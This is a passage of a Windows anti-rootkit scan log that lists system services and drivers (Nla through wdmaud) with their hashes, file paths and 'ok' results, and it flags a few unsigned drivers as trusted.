13:16:22.0171 0x08d8  Nla - ok
13:16:22.0187 0x08d8  [ 3182D64AE053D6FB034F44B6DEF8034A, 4ADFC76965BA2A5F488E71789A4E4EA702A74AF42725F72130D1CA919406CF19 ] Npfs            C:\WINDOWS\system32\drivers\Npfs.sys
13:16:22.0328 0x08d8  Npfs - ok
13:16:22.0375 0x08d8  [ 78A08DD6A8D65E697C18E1DB01C5CDCA, E0E6F3ED05068E32F1D5C2D2B38CDEF4536B8656DB6756C66CF6B40B60C8F3DA ] Ntfs            C:\WINDOWS\system32\drivers\Ntfs.sys
13:16:22.0546 0x08d8  Ntfs - ok
13:16:22.0578 0x08d8  [ 7F1C1F78D709C4A54CBB46EDE7E0B48D, 52135D41983A9E9E1DCA250A63017076AE22AA06D77CCF2E5EF41154F958584A ] NTIDrvr         C:\WINDOWS\system32\DRIVERS\NTIDrvr.sys
13:16:22.0593 0x08d8  NTIDrvr - detected UnsignedFile.Multi.Generic ( 1 )
13:16:25.0109 0x08d8  Detect skipped due to KSN trusted
13:16:25.0109 0x08d8  NTIDrvr - ok
13:16:25.0125 0x08d8  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] NtLmSsp         C:\WINDOWS\system32\lsass.exe
13:16:25.0296 0x08d8  NtLmSsp - ok
13:16:25.0343 0x08d8  [ 156F64A3345BD23C600655FB4D10BC08, 9611BE411586E068D9297D77102DB3BE48AA67F1BAD6F61A84F83FC3043FA9CD ] NtmsSvc         C:\WINDOWS\system32\ntmssvc.dll
13:16:25.0500 0x08d8  NtmsSvc - ok
13:16:25.0515 0x08d8  [ 73C1E1F395918BC2C6DD67AF7591A3AD, B21133A75253EC15E2DFF66D3B480AB1A7E1A2360476C810E7AA55D0F0EB08D4 ] Null            C:\WINDOWS\system32\drivers\Null.sys
13:16:25.0640 0x08d8  Null - ok
13:16:25.0656 0x08d8  [ B305F3FAD35083837EF46A0BBCE2FC57, 9D0E0E666D652D0FC9EAB97280A5D67AAF61D6B21929DF7CF8ED72A367720464 ] NwlnkFlt        C:\WINDOWS\system32\DRIVERS\nwlnkflt.sys
13:16:25.0796 0x08d8  NwlnkFlt - ok
13:16:25.0812 0x08d8  [ C99B3415198D1AAB7227F2C88FD664B9, DD8DA4B5E804F134AB9233859544C025062902DFC3E8FB8A09A67337A4E73F55 ] NwlnkFwd        C:\WINDOWS\system32\DRIVERS\nwlnkfwd.sys
13:16:25.0953 0x08d8  NwlnkFwd - ok
13:16:26.0078 0x08d8  [ 785F487A64950F3CB8E9F16253BA3B7B, 02445344BD214370A6D48B1CA04921D8EFCB13E676B5648266DD0E076C0822B6 ] odserv          C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE
13:16:26.0109 0x08d8  odserv - ok
13:16:26.0140 0x08d8  [ CA33832DF41AFB202EE7AEB05145922F, 9DD0089C2E13C7F81214C3B5A4A61276292052F9BBFEA7FCD0F6AA27815D5F95 ] ohci1394        C:\WINDOWS\system32\DRIVERS\ohci1394.sys
13:16:26.0281 0x08d8  ohci1394 - ok
13:16:26.0312 0x08d8  [ 5A432A042DAE460ABE7199B758E8606C, 6E5D1F477D290905BE27CEBF9572BAC6B05FFEF2FAD901D3C8E11F665F8B9A71 ] ose             C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE
13:16:26.0328 0x08d8  ose - ok
13:16:26.0359 0x08d8  [ 5575FAF8F97CE5E713D108C2A58D7C7C, 96D4595D19A78CCBE8B325A08780AC077AE5CC99642ACD72FB47AEAE8D344D3B ] Parport         C:\WINDOWS\system32\DRIVERS\parport.sys
13:16:26.0515 0x08d8  Parport - ok
13:16:26.0546 0x08d8  [ BEB3BA25197665D82EC7065B724171C6, 7E71C13BA30CD95CEE8A9CC85E6F48A01F30EDEAADEE69D80AE828BF97E5A5CA ] PartMgr         C:\WINDOWS\system32\drivers\PartMgr.sys
13:16:26.0718 0x08d8  PartMgr - ok
13:16:26.0750 0x08d8  [ 70E98B3FD8E963A6A46A2E6247E0BEA1, 6771313EC41B3B5BFD398F60706E40BE71617046880CC352DD110B001AFC22A1 ] ParVdm          C:\WINDOWS\system32\drivers\ParVdm.sys
13:16:26.0875 0x08d8  ParVdm - ok
13:16:26.0890 0x08d8  [ A219903CCF74233761D92BEF471A07B1, D4E6C360A1D2FCA4D17C991B834D68BF20F5111DD06B1FAB8B22984804CEC269 ] PCI             C:\WINDOWS\system32\DRIVERS\pci.sys
13:16:27.0031 0x08d8  PCI - ok
13:16:27.0062 0x08d8  [ CCF5F451BB1A5A2A522A76E670000FF0, D63F7E5A39653EC9CCE94B7D84B2D3EBD4F54533BD65701020198724042C9257 ] PCIIde          C:\WINDOWS\system32\DRIVERS\pciide.sys
13:16:27.0187 0x08d8  PCIIde - ok
13:16:27.0234 0x08d8  [ 9E89EF60E9EE05E3F2EEF2DA7397F1C1, 0BA3DB21DC7C641C181E2635B5C9B73965FDCDCD3EBBBE48FCFEC1C8C987F617 ] Pcmcia          C:\WINDOWS\system32\drivers\Pcmcia.sys
13:16:27.0375 0x08d8  Pcmcia - ok
13:16:27.0375 0x08d8  perc2 - ok
13:16:27.0390 0x08d8  perc2hib - ok
13:16:27.0421 0x08d8  [ 65DF52F5B8B6E9BBD183505225C37315, 59C606977DB40A3443DFF0BE2A4C761824881B22C9FDB3D23F6486DB580E92A4 ] PlugPlay        C:\WINDOWS\system32\services.exe
13:16:27.0437 0x08d8  PlugPlay - ok
13:16:27.0484 0x08d8  [ 65BC271F337637731D3C71455AE1F476, DAD32B61FE0147F8D2DA4C8F016920CD6BB2098F16E3CC2768009763E71DEFBC ] Pml Driver HPZ12 C:\WINDOWS\system32\HPZipm12.dll
13:16:27.0500 0x08d8  Pml Driver HPZ12 - detected UnsignedFile.Multi.Generic ( 1 )
13:16:30.0234 0x08d8  Detect skipped due to KSN trusted
13:16:30.0234 0x08d8  Pml Driver HPZ12 - ok
13:16:30.0250 0x08d8  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] PolicyAgent     C:\WINDOWS\system32\lsass.exe
13:16:30.0406 0x08d8  PolicyAgent - ok
13:16:30.0421 0x08d8  [ EFEEC01B1D3CF84F16DDD24D9D9D8F99, C5F0C8C66A3AF7E7BB04CEDE4AC5306F8387AB384A2107DC5BE413AAE968EFF1 ] PptpMiniport    C:\WINDOWS\system32\DRIVERS\raspptp.sys
13:16:30.0562 0x08d8  PptpMiniport - ok
13:16:30.0562 0x08d8  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] ProtectedStorage C:\WINDOWS\system32\lsass.exe
13:16:30.0703 0x08d8  ProtectedStorage - ok
13:16:30.0703 0x08d8  [ 09298EC810B07E5D582CB3A3F9255424, 35473A1BE25AC289474090EB0806AC6B3035DC33D1F3DF97A14BF1E361AC6AC3 ] PSched          C:\WINDOWS\system32\DRIVERS\psched.sys
13:16:30.0843 0x08d8  PSched - ok
13:16:30.0859 0x08d8  [ 00B670D8A36C7134CFC66B446A18CC92, 4D9DAEE5C9AED4AC6622AB8EFA634FE1E525B604604B5D655533DB4579964B62 ] psdfilter       C:\WINDOWS\system32\Drivers\psdfilter.sys
13:16:30.0875 0x08d8  psdfilter - detected UnsignedFile.Multi.Generic ( 1 )
13:16:33.0625 0x08d8  Detect skipped due to KSN trusted
13:16:33.0625 0x08d8  psdfilter - ok
13:16:33.0640 0x08d8  [ E9A60343CB7C39090638B1DD574F26EB, 52632F9E16C3B2BDF054D6AFB9BFF0FCD81F399669819C092D95128ED4D14BE0 ] psdvdisk        C:\WINDOWS\system32\Drivers\psdvdisk.sys
13:16:33.0656 0x08d8  psdvdisk - detected UnsignedFile.Multi.Generic ( 1 )
13:16:36.0390 0x08d8  Detect skipped due to KSN trusted
13:16:36.0390 0x08d8  psdvdisk - ok
13:16:36.0421 0x08d8  [ 80D317BD1C3DBC5D4FE7B1678C60CADD, DA76804B55D0CAB3DDD01EFC06673764AE4860693375C658B6063FB14AF7F12C ] Ptilink         C:\WINDOWS\system32\DRIVERS\ptilink.sys
13:16:36.0578 0x08d8  Ptilink - ok
13:16:36.0593 0x08d8  ql1080 - ok
13:16:36.0593 0x08d8  Ql10wnt - ok
13:16:36.0609 0x08d8  ql12160 - ok
13:16:36.0609 0x08d8  ql1240 - ok
13:16:36.0625 0x08d8  ql1280 - ok
13:16:36.0656 0x08d8  [ FE0D99D6F31E4FAD8159F690D68DED9C, 998685622ABE631984B7E4DBF91AB3594B1F574378D75EB9F6265F4650470692 ] RasAcd          C:\WINDOWS\system32\DRIVERS\rasacd.sys
13:16:36.0781 0x08d8  RasAcd - ok
13:16:36.0812 0x08d8  [ AD188BE7BDF94E8DF4CA0A55C00A5073, C7D76CB579FAEBCCC2873499441BACDD6BD6668ACF5ED7F31862656E96E2B20C ] RasAuto         C:\WINDOWS\System32\rasauto.dll
13:16:36.0953 0x08d8  RasAuto - ok
13:16:36.0968 0x08d8  [ 11B4A627BC9614B885C4969BFA5FF8A6, EAE0A412A2B0F68919C32A96B3A08CC1A06585E4998819F5C9051745F63FF5AD ] Rasl2tp         C:\WINDOWS\system32\DRIVERS\rasl2tp.sys
13:16:37.0109 0x08d8  Rasl2tp - ok
13:16:37.0140 0x08d8  [ 76A9A3CBEADD68CC57CDA5E1D7448235, 4AFD048C5D2306AB8DE46F3AA60AC0213333DDA3B09A9E91F7585DB6EB978EC8 ] RasMan          C:\WINDOWS\System32\rasmans.dll
13:16:37.0281 0x08d8  RasMan - ok
13:16:37.0296 0x08d8  [ 5BC962F2654137C9909C3D4603587DEE, A5CE5653D0105240F5E86CFAAB89E7917D42D939E2F27A5A7D6979289CA651B8 ] RasPppoe        C:\WINDOWS\system32\DRIVERS\raspppoe.sys
13:16:37.0437 0x08d8  RasPppoe - ok
13:16:37.0453 0x08d8  [ FDBB1D60066FCFBB7452FD8F9829B242, 10A2DACF944BD000032EBA8C095CB3D879CC55B28C377ADF6E52E508E47444DB ] Raspti          C:\WINDOWS\system32\DRIVERS\raspti.sys
13:16:37.0593 0x08d8  Raspti - ok
13:16:37.0640 0x08d8  [ 7AD224AD1A1437FE28D89CF22B17780A, 6645235CA27D671954E3557FA37082881C3D7D47492C71264CD8CB8D108EC801 ] Rdbss           C:\WINDOWS\system32\DRIVERS\rdbss.sys
13:16:37.0781 0x08d8  Rdbss - ok
13:16:37.0812 0x08d8  [ 4912D5B403614CE99C28420F75353332, 975341ECD660209987B5E5171B8315E032439E408CBE8A5986E67AF767F373BB ] RDPCDD          C:\WINDOWS\system32\DRIVERS\RDPCDD.sys
13:16:37.0953 0x08d8  RDPCDD - ok
13:16:37.0984 0x08d8  [ 15CABD0F7C00C47C70124907916AF3F1, 66B5C978B7FB6359AD8BAC9F568FE9D469E358FEAB07B1F129BA9E85F1DF723E ] rdpdr           C:\WINDOWS\system32\DRIVERS\rdpdr.sys
13:16:38.0140 0x08d8  rdpdr - ok
13:16:38.0203 0x08d8  [ 43AF5212BD8FB5BA6EED9754358BD8F7, AF330F61CECA4AFA359CEABC5EB3227E6B56A9A2DCE50701381D665122D7356D ] RDPWD           C:\WINDOWS\system32\drivers\RDPWD.sys
13:16:38.0250 0x08d8  RDPWD - ok
13:16:38.0281 0x08d8  [ 3C37BF86641BDA977C3BF8A840F3B7FA, AB9A6E54DBA3F4561CD4837372BECCE0D73943D02E3288F944333039375AC08C ] RDSessMgr       C:\WINDOWS\system32\sessmgr.exe
13:16:38.0421 0x08d8  RDSessMgr - ok
13:16:38.0453 0x08d8  [ F828DD7E1419B6653894A8F97A0094C5, E6150E1F598BA4CFEDB8FF075BC0D576518C331B864388F1CAE8812EFF106ECF ] redbook         C:\WINDOWS\system32\DRIVERS\redbook.sys
13:16:38.0593 0x08d8  redbook - ok
13:16:38.0625 0x08d8  [ 7E699FF5F59B5D9DE5390E3C34C67CF5, 3FCF0442D80AB181FED4303E570378736AA1F8718C0B8B70F689A1E45200FFE4 ] RemoteAccess    C:\WINDOWS\System32\mprdim.dll
13:16:38.0781 0x08d8  RemoteAccess - ok
13:16:38.0828 0x08d8  [ 5B19B557B0C188210A56A6B699D90B8F, 0FA880B81AE615206FD1738B83428AAA491D54B24168339DE6E87FDE8C6C14B0 ] RemoteRegistry  C:\WINDOWS\system32\regsvc.dll
13:16:39.0000 0x08d8  RemoteRegistry - ok
13:16:39.0015 0x08d8  [ D8B0B4ADE32574B2D9C5CC34DC0DBBE7, CDF10D3D8ADA7ADB1CC1567BFA986557C6D69F4099B70FDFABD4C3D09E3CA778 ] ROOTMODEM       C:\WINDOWS\system32\Drivers\RootMdm.sys
13:16:39.0171 0x08d8  ROOTMODEM - ok
13:16:39.0203 0x08d8  [ AAED593F84AFA419BBAE8572AF87CF6A, CC0FFC5A69394C8830DC66320DA01A820BBF41AD7E57D0FC343561DC5EF9A360 ] RpcLocator      C:\WINDOWS\system32\locator.exe
13:16:39.0375 0x08d8  RpcLocator - ok
13:16:39.0406 0x08d8  [ 6B27A5C03DFB94B4245739065431322C, 6AEAC16AB4E0DFD25123AAF4D4181FEE1B919B7B2793117006CE8CF30E826CFD ] RpcSs           C:\WINDOWS\System32\rpcss.dll
13:16:39.0437 0x08d8  RpcSs - ok
13:16:39.0468 0x08d8  [ 471B3F9741D762ABE75E9DEEA4787E47, D9ADE42965EC22AEB4B2AD21D429C3C8232A60AA9853DEFDA7AED86A13FE8623 ] RSVP            C:\WINDOWS\system32\rsvp.exe
13:16:39.0625 0x08d8  RSVP - ok
13:16:39.0640 0x08d8  [ BF2466B3E18E970D8A976FB95FC1CA85, F7794B5D12DC5D820A162850F4388E2AA80426AD07CB221799CF941C682AB501 ] SamSs           C:\WINDOWS\system32\lsass.exe
13:16:39.0781 0x08d8  SamSs - ok
13:16:39.0828 0x08d8  [ 39763504067962108505BFF25F024345, 73C9710B61EDC7FBEDE1D7A767AA3D3A169E7AD012494D05CB5EE7E5C5752BB9 ] SASDIFSV        C:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS
13:16:39.0828 0x08d8  SASDIFSV - ok
13:16:39.0843 0x08d8  [ 77B9FC20084B48408AD3E87570EB4A85, B5BC5FEC1356DECB66A7A671DB67112BDAC8F942BF1C4B986B1805B41EF362B1 ] SASKUTIL        C:\Program Files\SUPERAntiSpyware\SASKUTIL.SYS
13:16:39.0859 0x08d8  SASKUTIL - ok
13:16:39.0890 0x08d8  [ 86D007E7A654B9A71D1D7D856B104353, 7B1DE53D637A5FC9619D5D07C48927AFEC89D959207F6F2E2F45DD054EEA04C7 ] SCardSvr        C:\WINDOWS\System32\SCardSvr.exe
13:16:40.0031 0x08d8  SCardSvr - ok
13:16:40.0078 0x08d8  [ 0A9A7365A1CA4319AA7C1D6CD8E4EAFA, 0B582F47BD70732BAC48B8B86E5D06CE7F299A20E8177F3F2E6F28217C3FB605 ] Schedule        C:\WINDOWS\system32\schedsvc.dll
13:16:40.0250 0x08d8  Schedule - ok
13:16:40.0281 0x08d8  [ 90A3935D05B494A5A39D37E71F09A677, F72733A69BC6E1A2BB91D7632FF3463C12563F60FDCC00A2CDD67FF20D479952 ] Secdrv          C:\WINDOWS\system32\DRIVERS\secdrv.sys
13:16:40.0421 0x08d8  Secdrv - ok
13:16:40.0437 0x08d8  [ CBE612E2BB6A10E3563336191EDA1250, C331797DC3569F0E715766561DE2562F60B924378842246C35D2B1CF867E9D96 ] seclogon        C:\WINDOWS\System32\seclogon.dll
13:16:40.0593 0x08d8  seclogon - ok
13:16:40.0609 0x08d8  [ 7FDD5D0684ECA8C1F68B4D99D124DCD0, 7105B026F966A992430F86C3698ABE15EC73E4772F1A3E362E29FD5247A5DCA6 ] SENS            C:\WINDOWS\system32\sens.dll
13:16:40.0765 0x08d8  SENS - ok
13:16:40.0812 0x08d8  [ 0F29512CCD6BEAD730039FB4BD2C85CE, 4F98AE390D1B14A755700DD6CEFB9CF921F0404AF2145D2D7E5F52394F87C6A5 ] serenum         C:\WINDOWS\system32\DRIVERS\serenum.sys
13:16:40.0953 0x08d8  serenum - ok
13:16:40.0968 0x08d8  [ CCA207A8896D4C6A0C9CE29A4AE411A7, 5999B39242283CD803319AADCA171CCCC6E2A40FB2FAFA51B1D29F3FF2DD8D6C ] Serial          C:\WINDOWS\system32\DRIVERS\serial.sys
13:16:41.0109 0x08d8  Serial - ok
13:16:41.0171 0x08d8  [ 8E6B8C671615D126FDC553D1E2DE5562, CEEC0067514555D5CA489F50E3D7562FCA8DB8E952C3C878604C9277FC77959F ] Sfloppy         C:\WINDOWS\system32\drivers\Sfloppy.sys
13:16:41.0312 0x08d8  Sfloppy - ok
13:16:41.0343 0x08d8  [ 83F41D0D89645D7235C051AB1D9523AC, B681F33EEAA511D6A2DCB9FBAA407B739184C9FF6067C6B7E51F1FC37E9D4DD7 ] SharedAccess    C:\WINDOWS\System32\ipnathlp.dll
13:16:41.0515 0x08d8  SharedAccess - ok
13:16:41.0531 0x08d8  [ 99BC0B50F511924348BE19C7C7313BBF, A1006C687BD352F700B140DC741515A0CDD9E1352C0FBD1EE410D404E344444B ] ShellHWDetection C:\WINDOWS\System32\shsvcs.dll
13:16:41.0562 0x08d8  ShellHWDetection - ok
13:16:41.0578 0x08d8  Simbad - ok
13:16:41.0578 0x08d8  Sparrow - ok
13:16:41.0625 0x08d8  [ AB8B92451ECB048A4D1DE7C3FFCB4A9F, DD17733CBB370FCA08F0296704D7CBEACA3C8F76D0ABE4761C3B1FFDF7481D9E ] splitter        C:\WINDOWS\system32\drivers\splitter.sys
13:16:41.0750 0x08d8  splitter - ok
13:16:41.0781 0x08d8  [ 60784F891563FB1B767F70117FC2428F, E0B07F08E60FFBAD36C2E58180F4B2A16DCA47716044CBE0213DF7B74D742F1F ] Spooler         C:\WINDOWS\system32\spoolsv.exe
13:16:41.0828 0x08d8  Spooler - ok
13:16:41.0843 0x08d8  [ 76BB022C2FB6902FD5BDD4F78FC13A5D, 6031CB2344D7277FC703480EB43CF856A0F8F818EA98FF26A2CA532336CD2DFA ] sr              C:\WINDOWS\system32\DRIVERS\sr.sys
13:16:41.0984 0x08d8  sr - ok
13:16:42.0031 0x08d8  [ 3805DF0AC4296A34BA4BF93B346CC378, B57A14F1B7B0997E619DDD62B73157AA2399A9852166FB58139CBB358A88F6F3 ] srservice       C:\WINDOWS\system32\srsvc.dll
13:16:42.0187 0x08d8  srservice - ok
13:16:42.0234 0x08d8  [ 47DDFC2F003F7F9F0592C6874962A2E7, 17C643BD4EB09B5666FE41817DC785BE04A6E491CE79E8E5A702CDBD98E1BDD7 ] Srv             C:\WINDOWS\system32\DRIVERS\srv.sys
13:16:42.0296 0x08d8  Srv - ok
13:16:42.0312 0x08d8  [ 0A5679B3714EDAB99E357057EE88FCA6, 01E1A101FFF48402C77E385A78FEF27876E04533B60EB1C18558A737E57E5FA8 ] SSDPSRV         C:\WINDOWS\System32\ssdpsrv.dll
13:16:42.0453 0x08d8  SSDPSRV - ok
13:16:42.0484 0x08d8  [ A9573045BAA16EAB9B1085205B82F1ED, 6A4D68BCD4968C17451EB1C4AB420FFA844D089845520D222BC4A2BD14583C56 ] StillCam        C:\WINDOWS\system32\DRIVERS\serscan.sys
13:16:42.0609 0x08d8  StillCam - ok
13:16:42.0656 0x08d8  [ 8BAD69CBAC032D4BBACFCE0306174C30, 2AA0DA710FCBFF38FE8DA91EE02E7A4503269347E61F8D3246FCA3384BBA2305 ] stisvc          C:\WINDOWS\system32\wiaservc.dll
13:16:42.0843 0x08d8  stisvc - ok
13:16:42.0890 0x08d8  [ 2E5586392CDFBD1D73BADB20E9ED6386, 8C296A4EB50750D5CC59C8B96034017AD957F8BE09153196778A519F061876EA ] SupportSoft RemoteAssist C:\Program Files\Common Files\SupportSoft\bin\ssrc.exe
13:16:42.0937 0x08d8  SupportSoft RemoteAssist - ok
13:16:42.0953 0x08d8  [ 3941D127AEF12E93ADDF6FE6EE027E0F, EA1F0E32E1C5E90FA4AAC421DEBBE086512340758D3217A6334E886BCE638B51 ] swenum          C:\WINDOWS\system32\DRIVERS\swenum.sys
13:16:43.0125 0x08d8  swenum - ok
13:16:43.0140 0x08d8  [ 8CE882BCC6CF8A62F2B2323D95CB3D01, B408550A581F3DA222355964AFA4E976AD8471F0AA37573C42C4948AE5A23A3B ] swmidi          C:\WINDOWS\system32\drivers\swmidi.sys
13:16:43.0281 0x08d8  swmidi - ok
13:16:43.0281 0x08d8  SwPrv - ok
13:16:43.0296 0x08d8  symc810 - ok
13:16:43.0312 0x08d8  symc8xx - ok
13:16:43.0328 0x08d8  [ B226F8A4D780ACDF76145B58BB791D5B, 6E8304956E9FD827A2FCAB0CB9D200500E8E71CE79C9909684666DD548D3FD31 ] symlcbrd        C:\WINDOWS\system32\drivers\symlcbrd.sys
13:16:43.0343 0x08d8  symlcbrd - ok
13:16:43.0359 0x08d8  sym_hi - ok
13:16:43.0359 0x08d8  sym_u3 - ok
13:16:43.0390 0x08d8  [ 8B83F3ED0F1688B4958F77CD6D2BF290, 546D3602183702B4F53E84413CFA2C933D64C8540378E54A8DCD148F3F36A2DA ] sysaudio        C:\WINDOWS\system32\drivers\sysaudio.sys
13:16:43.0531 0x08d8  sysaudio - ok
13:16:43.0546 0x08d8  [ C7ABBC59B43274B1109DF6B24D617051, 4384CA0AA6CE9B603CF7DB775A3C721E46715D5B120B94FB57DEADAADE18535B ] SysmonLog       C:\WINDOWS\system32\smlogsvc.exe
13:16:43.0703 0x08d8  SysmonLog - ok
13:16:43.0750 0x08d8  [ 3CB78C17BB664637787C9A1C98F79C38, F35C31F6B7F366CB949D1044B357C76DEC9170441C5E559802794F62B72FD255 ] TapiSrv         C:\WINDOWS\System32\tapisrv.dll
13:16:43.0890 0x08d8  TapiSrv - ok
13:16:43.0937 0x08d8  [ 9AEFA14BD6B182D61E3119FA5F436D3D, EA29E49434585409272E7901AF89771FE9D6E911A7DC44AB3C7020CFF8A44552 ] Tcpip           C:\WINDOWS\system32\DRIVERS\tcpip.sys
13:16:43.0968 0x08d8  Tcpip - ok
13:16:44.0000 0x08d8  [ 6471A66807F5E104E4885F5B67349397, F35CBFFB8BB235CCE30EF94A5273333900DD49FD506BF9D55D99A320B8A53A5A ] TDPIPE          C:\WINDOWS\system32\drivers\TDPIPE.sys
13:16:44.0140 0x08d8  TDPIPE - ok
13:16:44.0156 0x08d8  [ C56B6D0402371CF3700EB322EF3AAF61, 7743FA4C734BCE38EFB1CA69BC17364D8421E2CD172F856F7E38E7AE1EE93F2F ] TDTCP           C:\WINDOWS\system32\drivers\TDTCP.sys
13:16:44.0296 0x08d8  TDTCP - ok
13:16:44.0328 0x08d8  [ 88155247177638048422893737429D9E, B6D4E8691917946332C2208D01F8C8281978C1AD1E9951C5D99DF0D49AC34B3B ] TermDD          C:\WINDOWS\system32\DRIVERS\termdd.sys
13:16:44.0453 0x08d8  TermDD - ok
13:16:44.0500 0x08d8  [ FF3477C03BE7201C294C35F684B3479F, D6246521539BA4ACD022D26983182F5E323D2EF1EA7C54265A248C43A1CE5202 ] TermService     C:\WINDOWS\System32\termsrv.dll
13:16:44.0640 0x08d8  TermService - ok
13:16:44.0671 0x08d8  [ 99BC0B50F511924348BE19C7C7313BBF, A1006C687BD352F700B140DC741515A0CDD9E1352C0FBD1EE410D404E344444B ] Themes          C:\WINDOWS\System32\shsvcs.dll
13:16:44.0687 0x08d8  Themes - ok
13:16:44.0718 0x08d8  [ DB7205804759FF62C34E3EFD8A4CC76A, 13A4248F528CE98ACA66898E56822E4FC49B11F491FF1F61A687BA601BF0A802 ] TlntSvr         C:\WINDOWS\system32\tlntsvr.exe
13:16:44.0859 0x08d8  TlntSvr - ok
13:16:44.0859 0x08d8  TosIde - ok
13:16:44.0890 0x08d8  [ 55BCA12F7F523D35CA3CB833C725F54E, 849FB1AE31B143B14B298BBC0D91230693D41DEB95F46516878F53A7F4186C38 ] TrkWks          C:\WINDOWS\system32\trkwks.dll
13:16:45.0031 0x08d8  TrkWks - ok
13:16:45.0046 0x08d8  [ E0C67BE430C6DE490D6CCAECFA071F9E, 831858F9A07122FBE513FC56D79F39F973FC9BA757D509C113AA975DE8A70EE5 ] UBHelper        C:\WINDOWS\system32\drivers\UBHelper.sys
13:16:45.0046 0x08d8  UBHelper - detected UnsignedFile.Multi.Generic ( 1 )
13:16:47.0562 0x08d8  Detect skipped due to KSN trusted
13:16:47.0562 0x08d8  UBHelper - ok
13:16:47.0593 0x08d8  [ 5787B80C2E3C5E2F56C2A233D91FA2C9, 3774905CF77954DFCECDA5BCC7CDE3D0ED72712BFAAD85ADAE5246306447E46C ] Udfs            C:\WINDOWS\system32\drivers\Udfs.sys
13:16:47.0765 0x08d8  Udfs - ok
13:16:47.0781 0x08d8  ultra - ok
13:16:47.0812 0x08d8  [ 402DDC88356B1BAC0EE3DD1580C76A31, 32A686595710336A6BFD54C03F552AE39439611662F84EF5D24193AE5665C6F3 ] Update          C:\WINDOWS\system32\DRIVERS\update.sys
13:16:47.0984 0x08d8  Update - ok
13:16:48.0031 0x08d8  [ 1EBAFEB9A3FBDC41B8D9C7F0F687AD91, 7746916DB48E3F5B243B63C066596AD9037A494BF1AD935946DD04AC85D983DF ] upnphost        C:\WINDOWS\System32\upnphost.dll
13:16:48.0187 0x08d8  upnphost - ok
13:16:48.0218 0x08d8  [ 05365FB38FCA1E98F7A566AAAF5D1815, 16843048CEEC3DAA3B953A12FF1EE339E86783A08F2A56DA7F94AD9F9717D77D ] UPS             C:\WINDOWS\System32\ups.exe
13:16:48.0359 0x08d8  UPS - ok
13:16:48.0390 0x08d8  [ 73B41F4EAD65F355962168D766AF0F2E, AA33CAE55D4766C9F1E9F1B50EEAE1CA4BE968380C89892A46D2D25EAEEDC64D ] USBAAPL         C:\WINDOWS\system32\Drivers\usbaapl.sys
13:16:48.0453 0x08d8  USBAAPL - ok
13:16:48.0468 0x08d8  [ 1B611611C28D2DF25BC057D79C6F13FC, B0D86F63E44B40413BBAE6402CC088046CFAE082D41BBC2ED5A916293356B846 ] usbccgp         C:\WINDOWS\system32\DRIVERS\usbccgp.sys
13:16:48.0515 0x08d8  usbccgp - ok
13:16:48.0531 0x08d8  [ 4BAC8DF07F1D8434FC640E677A62204E, 76C1351AF6752224BF59DEEE0F8665FE699F3DFD679F5BCD01C7D9383E6402A4 ] usbehci         C:\WINDOWS\system32\DRIVERS\usbehci.sys
13:16:48.0562 0x08d8  usbehci - ok
13:16:48.0609 0x08d8  [ 1AB3CDDE553B6E064D2E754EFE20285C, A99C4528C4227B1E96847614745AAFACD3C5F1BDFE435214DBF78740FFB300FE ] usbhub          C:\WINDOWS\system32\DRIVERS\usbhub.sys
13:16:48.0750 0x08d8  usbhub - ok
13:16:48.0765 0x08d8  [ A717C8721046828520C9EDF31288FC00, 1530BBE832EDBB0974AD89D723A03FF7A0094B368992D73C2C3E62A181DF1E0A ] usbprint        C:\WINDOWS\system32\DRIVERS\usbprint.sys
13:16:48.0906 0x08d8  usbprint - ok
13:16:48.0937 0x08d8  [ F8EDE2B6928970DCE3D5614C27D9E7F6, 6E5EBBC8B70C1D593634DAF0C190DEADFDA18C3CBC8F552A76F156F3869EF05B ] usbscan         C:\WINDOWS\system32\DRIVERS\usbscan.sys
13:16:48.0968 0x08d8  usbscan - ok
13:16:48.0984 0x08d8  [ A32426D9B14A089EAA1D922E0C5801A9, ED1DC52EE45F8EAD3AEC4B1F817BB25634141CF48295494C5947DCE6CF7A9817 ] USBSTOR         C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS
13:16:49.0140 0x08d8  USBSTOR - ok
13:16:49.0171 0x08d8  [ 26496F9DEE2D787FC3E61AD54821FFE6, 8BE7FF647470B9A951CBB478FAF83D657A15CC78037F42348A6B738F21D523DA ] usbuhci         C:\WINDOWS\system32\DRIVERS\usbuhci.sys
13:16:49.0328 0x08d8  usbuhci - ok
13:16:49.0343 0x08d8  [ 0D3A8FAFCEACD8B7625CD549757A7DF1, B9CFDEFCD66AA139F3DC2F967B184669532922563AD5A71769BABDC4370D065E ] VgaSave         C:\WINDOWS\System32\drivers\vga.sys
13:16:49.0484 0x08d8  VgaSave - ok
13:16:49.0484 0x08d8  ViaIde - ok
13:16:49.0500 0x08d8  [ 4C8FCB5CC53AAB716D810740FE59D025, 010EAC43DBED700B73E4FC908FAAF9F6A0168EBBD5D86751E49BC33AAA18BFA4 ] VolSnap         C:\WINDOWS\system32\drivers\VolSnap.sys
13:16:49.0656 0x08d8  VolSnap - ok
13:16:49.0703 0x08d8  [ 7A9DB3A67C333BF0BD42E42B8596854B, D31A9A3B1AAAB373EDD73B674102395212FCB616F829E938B7B2B7BE7D4752C5 ] VSS             C:\WINDOWS\System32\vssvc.exe
13:16:49.0843 0x08d8  VSS - ok
13:16:49.0875 0x08d8  [ 54AF4B1D5459500EF0937F6D33B1914F, FA1876888BCB9C72A92369DBED4FF1A8666784523FB41E618FA0919490FCDDB9 ] W32Time         C:\WINDOWS\system32\w32time.dll
13:16:50.0031 0x08d8  W32Time - ok
13:16:50.0062 0x08d8  [ E20B95BAEDB550F32DD489265C1DA1F6, 5589B2067E6C9FBA290D8C5EADDC198EBAF39C50C3CD7D2BC5CDA7CBFBC445E5 ] Wanarp          C:\WINDOWS\system32\DRIVERS\wanarp.sys
13:16:50.0359 0x08d8  Wanarp - ok
13:16:50.0375 0x08d8  [ 6768ACF64B18196494413695F0C3A00F, 3A8F8586F1D997D19A8478345338D2AECD785AEABDB61531DD3F92003D3230A5 ] wdmaud          C:\WINDOWS\system32\drivers\wdmaud.sys
